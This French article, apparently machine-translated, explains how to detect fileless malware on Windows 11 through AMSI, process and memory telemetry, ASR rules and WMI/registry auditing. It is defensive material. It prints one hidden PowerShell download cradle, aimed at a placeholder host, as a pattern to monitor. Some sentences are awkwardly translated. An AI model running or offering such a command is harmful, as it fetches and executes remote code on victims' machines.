Comment détecter les logiciels malveillants sans fichier dangereux sous Windows 11

Dernière mise à jour: 23/11/2025

  • Les logiciels malveillants sans fichier fonctionnent en mémoire et détournent des processus légitimes tels que PowerShell et WMI.
  • Une détection efficace nécessite la surveillance des comportements et l'analyse de la mémoire, et pas seulement des fichiers.
  • AMSI, la télémétrie des processus, les règles de réduction de surface et la recherche proactive sont des fonctionnalités clés de Windows 11.
  • La persistance dans WMI, le registre et le MBR, ainsi que dans le firmware et les périphériques USB, élargit la surface d'attaque.

Comment détecter les logiciels malveillants sans fichier dangereux

¿Comment détecter les logiciels malveillants sans fichier dangereux ? L'activité des attaques sans fichier a considérablement augmenté, et pour ne rien arranger, Windows 11 n'est pas immunisé.Cette approche contourne le disque et s'appuie sur la mémoire et les outils système légitimes ; c'est pourquoi les antivirus basés sur les signatures rencontrent des difficultés. Si vous recherchez une méthode fiable pour la détecter, la solution consiste à combiner différentes approches. Télémétrie, analyse comportementale et contrôles Windows.

Dans l'écosystème actuel, les campagnes qui exploitent PowerShell, WMI ou Mshta coexistent avec des techniques plus sophistiquées telles que les injections de mémoire, la persistance « sans accès » au disque, et même abus de firmwareL'essentiel est de comprendre la cartographie des menaces, les phases d'attaque et les signaux qu'elles laissent même lorsque tout se passe dans la RAM.

Qu’est-ce qu’un logiciel malveillant sans fichier et pourquoi est-il préoccupant sous Windows 11 ?

Lorsque nous parlons de menaces « sans fichier », nous faisons référence à un code malveillant qui Vous n'avez pas besoin de déposer de nouveaux fichiers exécutables. pour fonctionner dans le système de fichiers. Il est généralement injecté dans des processus en cours d'exécution et exécuté dans la RAM, en s'appuyant sur des interpréteurs et des binaires signés par Microsoft (par exemple, PowerShell, WMI, rundll32, mshtaCela réduit votre empreinte numérique et vous permet de contourner les moteurs de recherche qui ne recherchent que les fichiers suspects.

Même les documents bureautiques ou les PDF qui exploitent des vulnérabilités pour lancer des commandes sont considérés comme faisant partie du phénomène, car activer l'exécution en mémoire sans laisser de fichiers binaires exploitables pour l'analyse. Abus de macros et DDE Dans Office, puisque le code s'exécute dans des processus légitimes comme WinWord.

Les attaquants combinent l'ingénierie sociale (hameçonnage, liens indésirables) avec des pièges techniques : le clic de l'utilisateur déclenche une chaîne dans laquelle un script télécharge et exécute la charge utile finale en mémoire. éviter de laisser de traces sur le disque. Les objectifs vont du vol de données à l'exécution de rançongiciels, en passant par les déplacements latéraux silencieux.

Détection de logiciels malveillants sans fichier

Typologies selon l'empreinte au sein du système : des solutions « pures » aux solutions hybrides

Pour éviter toute confusion, il est utile de classer les menaces selon leur degré d'interaction avec le système de fichiers. Cette catégorisation clarifie Que subsiste-t-il, où réside le code, et quelles traces laisse-t-il ?.

Type I : aucune activité de fichier

Les logiciels malveillants totalement sans fichier n'écrivent rien sur le disque. Un exemple classique consiste à exploiter une faille de sécurité. vulnérabilité du réseau (Comme le vecteur EternalBlue à l'époque) pour implémenter une porte dérobée résidant dans la mémoire du noyau (cas comme DoublePulsar). Ici, tout se passe dans la RAM et il n'y a aucune trace dans le système de fichiers.

Une autre option consiste à contaminer le firmware des composants : BIOS/UEFI, cartes réseau, périphériques USB (techniques de type BadUSB) ou même sous-systèmes du processeur. Ces problèmes persistent après redémarrage et réinstallation, avec la difficulté supplémentaire que Peu de produits analysent le firmwareCe sont des attaques complexes, moins fréquentes, mais dangereuses en raison de leur furtivité et de leur durabilité.

Type II : Activité d'archivage indirecte

Ici, le logiciel malveillant ne « laisse » pas son propre exécutable, mais utilise des conteneurs gérés par le système qui sont essentiellement stockés sous forme de fichiers. Par exemple, des portes dérobées qui installent commandes powershell Le référentiel WMI peut être installé et son exécution déclenchée par des filtres d'événements. Bien qu'il soit possible de l'installer en ligne de commande sans installer de fichiers binaires, le référentiel WMI réside sur le disque comme une base de données à part entière, ce qui rend son nettoyage difficile sans impacter le système.

D'un point de vue pratique, ils sont considérés comme sans fichier, car ce conteneur (WMI, Registre, etc.) Il ne s'agit pas d'un exécutable détectable classique. Et son élimination n'est pas chose aisée. Résultat : une persistance furtive ne laissant que peu de traces « traditionnelles ».

Contenu exclusif - Cliquez ici  Le meilleur antivirus gratuit pour Windows 10

Type III : Nécessite des fichiers pour fonctionner

Certains cas maintiennent un persistance « sans fichier » Logiquement, ils ont besoin d'un déclencheur basé sur un fichier. L'exemple typique est Kovter : il enregistre une commande shell pour une extension aléatoire ; lorsqu'un fichier avec cette extension est ouvert, un petit script utilisant mshta.exe est lancé, qui reconstitue la chaîne malveillante à partir du registre.

L'astuce consiste à utiliser des fichiers « appâts » aux extensions aléatoires qui ne contiennent pas de charge utile analysable, la majeure partie du code se trouvant dans le enregistrer (un autre conteneur). C'est pourquoi ils sont classés comme ayant un impact sans fichier, même si, à proprement parler, ils dépendent d'un ou plusieurs artefacts de disque comme déclencheur.

Vecteurs et « hôtes » de l’infection : où elle pénètre et où elle se cache

Pour améliorer la détection, il est essentiel de cartographier le point d'entrée et l'hôte de l'infection. Cette perspective contribue à la conception contrôles spécifiques Prioriser les données de télémétrie appropriées.

Exploits

  • Basé sur les fichiers (Type III) : Des documents, des exécutables, d’anciens fichiers Flash/Java ou des fichiers LNK peuvent exploiter le navigateur ou le moteur qui les traite pour charger du code malveillant en mémoire. Le premier vecteur est un fichier, mais la charge utile est transférée vers la RAM.
  • Réseau (Type I) : Un paquet exploitant une vulnérabilité (par exemple, dans SMB) parvient à s’exécuter dans l’espace utilisateur ou le noyau. WannaCry a popularisé cette approche. Chargement direct de la mémoire sans nouveau fichier.

Matériel

  • Dispositifs (Type I) : Le micrologiciel du disque ou de la carte réseau peut être altéré et du code malveillant introduit. Difficile à inspecter, ce code persiste en dehors du système d’exploitation.
  • Sous-systèmes CPU et de gestion (Type I) : Des technologies telles que ME/AMT d'Intel ont démontré des possibilités pour Mise en réseau et exécution en dehors du système d'exploitationIl attaque à un niveau très bas, avec un potentiel de furtivité élevé.
  • USB (Type I) : BadUSB vous permet de reprogrammer une clé USB pour qu'elle imite un clavier ou une carte réseau et lance des commandes ou redirige le trafic.
  • BIOS / UEFI (Type I) : reprogrammation malveillante du firmware (cas comme Mebromi) qui s'exécute avant le démarrage de Windows.
  • Hyperviseur (Type I) : Implémentation d’un mini-hyperviseur sous le système d’exploitation pour dissimuler sa présence. Rare, mais déjà observé sous la forme de rootkits d’hyperviseur.

Exécution et injection

  • Basé sur les fichiers (Type III) : EXE/DLL/LNK ou tâches planifiées qui lancent des injections dans des processus légitimes.
  • Macros (Type III) : VBA dans Office peut décoder et exécuter des charges utiles, y compris des ransomwares complets, avec le consentement de l'utilisateur par tromperie.
  • Scripts (Type II) : PowerShell, VBScript ou JScript à partir d'un fichier, de la ligne de commande, services, inscription ou WMIL'attaquant peut saisir le script dans une session distante sans toucher au disque.
  • Enregistrement de démarrage (MBR/Démarrage) (Type II) : Les familles de périphériques comme Petya écrasent le secteur de démarrage pour prendre le contrôle au démarrage. Ce secteur est situé en dehors du système de fichiers, mais accessible au système d’exploitation et aux solutions modernes permettant sa restauration.

Fonctionnement des attaques sans fichier : phases et signaux

Bien qu'elles ne laissent pas de fichiers exécutables, les campagnes suivent une logique par étapes. Leur compréhension permet d'assurer un suivi. événements et relations entre les processus qui laissent des traces.

  • Accès initialLes attaques de phishing utilisent des liens ou des pièces jointes, des sites web compromis ou des identifiants volés. De nombreuses attaques débutent par un document Office qui déclenche une commande. PowerShell.
  • Persistance: portes dérobées via WMI (filtres et abonnements), clés d'exécution du registre ou des tâches planifiées qui relancent des scripts sans nouveau fichier malveillant.
  • ExfiltrationUne fois les informations collectées, elles sont envoyées hors du réseau en utilisant des processus de confiance (navigateurs, PowerShell, bitsadmin) pour mélanger le trafic.

Ce schéma est particulièrement insidieux car le indicateurs d'attaque Ils se dissimulent derrière une apparence de normalité : arguments de ligne de commande, chaînage de processus, connexions sortantes anormales ou accès aux API d’injection.

Techniques courantes : de la mémoire à l’enregistrement

Les acteurs s'appuient sur un éventail de méthodes qui optimisent la furtivité. Il est utile de connaître les plus courantes pour activer une détection efficace.

  • Résident en mémoireChargement des données utiles dans l'espace d'un processus de confiance qui attend d'être activé. rootkits et hooks Au niveau du noyau, ils augmentent le niveau de dissimulation.
  • Persistance dans le registreSauvegardez les données chiffrées dans des clés et réhydratez-les à partir d'un lanceur légitime (mshta, rundll32, wscript). L'installateur éphémère peut s'autodétruire afin de minimiser son impact sur les performances.
  • Hameçonnage d'identifiantsEn utilisant des noms d'utilisateur et des mots de passe volés, l'attaquant exécute des shells distants et installe des systèmes. accès silencieux dans le registre ou WMI.
  • Ransomware « sans fichier »Le chiffrement et la communication C2 sont orchestrés depuis la RAM, réduisant ainsi les possibilités de détection jusqu'à ce que les dégâts soient visibles.
  • kits opératoires: des chaînes automatisées qui détectent les vulnérabilités et déploient des charges utiles en mémoire uniquement après le clic de l'utilisateur.
  • Documents contenant du code: des macros et des mécanismes comme DDE qui déclenchent des commandes sans enregistrer de fichiers exécutables sur le disque.
Contenu exclusif - Cliquez ici  Windows ne s'éteint pas : causes et solutions

Des études sectorielles ont déjà mis en évidence des pics notables : au cours d’une période de 2018, augmentation de plus de 90% Dans les attaques en chaîne basées sur des scripts et PowerShell, c'est un signe que ce vecteur est privilégié pour son efficacité.

Le défi pour les entreprises et les fournisseurs : pourquoi le blocage ne suffit pas

Il serait tentant de désactiver PowerShell ou d'interdire les macros définitivement, mais Vous compromettriez l'opérationPowerShell est un pilier de l'administration moderne et Office est essentiel en entreprise ; un blocage aveugle est souvent impossible.

De plus, il existe des moyens de contourner les contrôles de base : exécuter PowerShell via des DLL et rundll32, empaqueter des scripts dans des EXE, Apportez votre propre copie de PowerShell voire dissimuler des scripts dans des images et les extraire en mémoire. Par conséquent, la défense ne peut se fonder uniquement sur la négation de l'existence de ces outils.

Une autre erreur fréquente consiste à déléguer l'intégralité de la décision au cloud : si l'agent doit attendre une réponse du serveur, Vous perdez la prévention en temps réelLes données de télémétrie peuvent être téléchargées pour enrichir les informations, mais les L'atténuation doit avoir lieu au point final.

Comment détecter les logiciels malveillants sans fichier sous Windows 11 : télémétrie et comportement

La stratégie gagnante est surveiller les processus et la mémoireIl ne s'agit pas de fichiers. Les comportements malveillants sont plus stables que les formes que peuvent prendre les fichiers, ce qui les rend idéaux pour les moteurs de prévention.

  • AMSI (Interface d'analyse anti-malware)Il intercepte les scripts PowerShell, VBScript ou JScript, même lorsqu'ils sont construits dynamiquement en mémoire. Idéal pour capturer les chaînes de caractères obfusquées avant leur exécution.
  • Surveillance des processus: départ/arrivée, PID, parents et enfants, itinéraires, lignes de commande et des hachages, ainsi que des arbres d'exécution pour comprendre toute l'histoire.
  • Analyse de la mémoire: détection des injections, des charges réfléchissantes ou PE sans toucher le disque, et examen des régions exécutables inhabituelles.
  • Protection du secteur des démarreurs: contrôle et restauration du MBR/EFI en cas de falsification.

Dans l'écosystème Microsoft, Defender pour Endpoint combine AMSI, surveillance des comportementsL'analyse de la mémoire et l'apprentissage automatique dans le cloud sont utilisés pour adapter la détection aux variantes nouvelles ou obfusquées. D'autres fournisseurs emploient des approches similaires avec des moteurs résidant dans le noyau.

Exemple concret de corrélation : du document à PowerShell

Imaginez une chaîne de processus où Outlook télécharge une pièce jointe, Word ouvre le document, le contenu interactif est activé et PowerShell est lancé avec des paramètres suspects. Une télémétrie appropriée révélerait ce problème. Ligne de commande (par exemple, contournement de la stratégie d'exécution, fenêtre cachée), connexion à un domaine non fiable et création d'un processus enfant qui s'installe dans AppData.

Un agent disposant d'un contexte local est capable de arrêt et marche arrière activité malveillante sans intervention manuelle, en plus de la notification au SIEM ou par e-mail/SMS. Certains produits ajoutent une couche d'attribution de la cause racine (modèles de type Storyline), qui pointe non pas vers le processus visible (Outlook/Word), mais vers le processus sous-jacent. fil de discussion malveillant complet et son origine pour nettoyer le système de manière exhaustive.

Un schéma de commande typique à surveiller pourrait ressembler à ceci : powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');La logique n'est pas la chaîne exacte, mais l'ensemble des signaux: contournement des politiques, fenêtre cachée, téléchargement transparent et exécution en mémoire.

AMSI, pipeline et rôle de chaque acteur : du point de terminaison au SOC

Au-delà de la simple capture de script, une architecture robuste orchestre les étapes qui facilitent l'enquête et la réponse. Plus on dispose de preuves avant d'exécuter la charge, mieux c'est., mieux.

  • Interception de scriptAMSI fournit le contenu (même s'il est généré à la volée) pour l'analyse statique et dynamique dans un pipeline de logiciels malveillants.
  • Événements de traitementLes PID, les binaires, les hachages, les routes et autres données sont collectés. des arguments, établissant les arbres de processus qui ont conduit au chargement final.
  • Détection et signalementLes détections sont affichées sur la console du produit et transmises aux plateformes réseau (NDR) pour la visualisation de la campagne.
  • Garanties de l'utilisateurMême si un script est injecté en mémoire, le framework AMSI l'intercepte dans les versions compatibles de Windows.
  • Fonctionnalités d'administrateur: configuration de la stratégie pour activer l'inspection des scripts, blocage basé sur le comportement et la création de rapports à partir de la console.
  • Travaux du SOC: extraction des artefacts (UUID de la machine virtuelle, version du système d'exploitation, type de script, processus initiateur et son parent, hachages et lignes de commande) pour recréer l'historique et règles d'ascenseur futur.
Contenu exclusif - Cliquez ici  Où Google stocke-t-il les mots de passe ?

Lorsque la plateforme permet l'exportation mémoire tampon Associées à l'exécution, ces méthodes permettent aux chercheurs de générer de nouvelles détections et d'enrichir la défense contre des variantes similaires.

Mesures pratiques sous Windows 11 : prévention et chasse

Installer Windows 11 correctement en 2025

En plus de disposer d'une solution EDR avec inspection de la mémoire et AMSI, Windows 11 vous permet de réduire les failles de sécurité et d'améliorer la visibilité grâce à contrôles natifs.

  • Inscription et restrictions dans PowerShellActive la journalisation des blocs de script et des modules, applique les modes restreints lorsque cela est possible et contrôle l'utilisation de Contournement/Caché.
  • Règles de réduction de la surface d'attaque (ASR): bloque les lancements de scripts par les processus Office et abus de WMI/PSExec lorsque ce n'est pas nécessaire.
  • Politiques macro du bureau: désactive par défaut la signature des macros internes et les listes de confiance strictes ; surveille les flux DDE hérités.
  • Audit et registre WMI: surveille les abonnements aux événements et les clés d'exécution automatique (Run, RunOnce, Winlogon), ainsi que la création de tâches programmé.
  • Protection des startups: active le démarrage sécurisé, vérifie l'intégrité du MBR/EFI et valide qu'il n'y a pas de modifications au démarrage.
  • Réparation et durcissement: corrige les vulnérabilités exploitables dans les navigateurs, les composants Office et les services réseau.
  • sensibilisation: forme les utilisateurs et les équipes techniques au phishing et aux signaux d'alerte exécutions secrètes.

Pour la recherche, concentrez-vous sur les requêtes concernant : la création de processus Office vers PowerShell/MSHTA, les arguments avec chaîne de téléchargement/fichier de téléchargementScripts présentant une obfuscation manifeste, des injections par réflexion et des réseaux sortants vers des TLD suspects. Croisez ces signaux avec la réputation et la fréquence afin de réduire le bruit.

Que peut détecter chaque moteur aujourd'hui ?

Les solutions d'entreprise de Microsoft combinent AMSI, l'analyse comportementale, examiner la mémoire et la protection du secteur de démarrage, ainsi que des modèles d'apprentissage automatique basés sur le cloud pour s'adapter aux menaces émergentes. D'autres fournisseurs mettent en œuvre une surveillance au niveau du noyau pour différencier les logiciels malveillants des logiciels légitimes, avec restauration automatique des modifications.

Une approche basée sur récits d'exécution Il vous permet d'identifier la cause première (par exemple, une pièce jointe Outlook qui déclenche une chaîne) et d'atténuer l'ensemble de l'arbre : scripts, clés, tâches et fichiers binaires intermédiaires, évitant ainsi de rester bloqué sur le symptôme visible.

Erreurs courantes et comment les éviter

Comment nettoyer le registre Windows sans rien casser

Bloquer PowerShell sans plan de gestion alternatif est non seulement impraticable, mais il existe également façons de l'invoquer indirectementIl en va de même pour les macros : soit vous les gérez à l’aide de politiques et de signatures, soit l’activité en pâtira. Il est préférable de privilégier la télémétrie et les règles comportementales.

Une autre erreur fréquente consiste à croire que la mise sur liste blanche des applications résout tous les problèmes : la technologie sans fichier repose précisément sur ce principe. applications fiablesLe contrôle doit observer ce qu'ils font et comment ils interagissent, et pas seulement si cela est autorisé.

Avec tout ce qui précède, les logiciels malveillants sans fichier cessent d'être un « fantôme » lorsque vous surveillez ce qui compte vraiment : comportement, mémoire et origines Pour chaque exécution, l'association d'AMSI, d'une télémétrie de processus détaillée, des contrôles natifs de Windows 11 et d'une couche EDR avec analyse comportementale vous confère un avantage certain. Ajoutez à cela des politiques réalistes pour les macros et PowerShell, l'audit WMI/Registre et une recherche priorisant les lignes de commande et les arborescences de processus, et vous obtenez une défense qui coupe court à ces chaînes avant même qu'elles ne se manifestent.

Article connexe:
Réseaux informatiques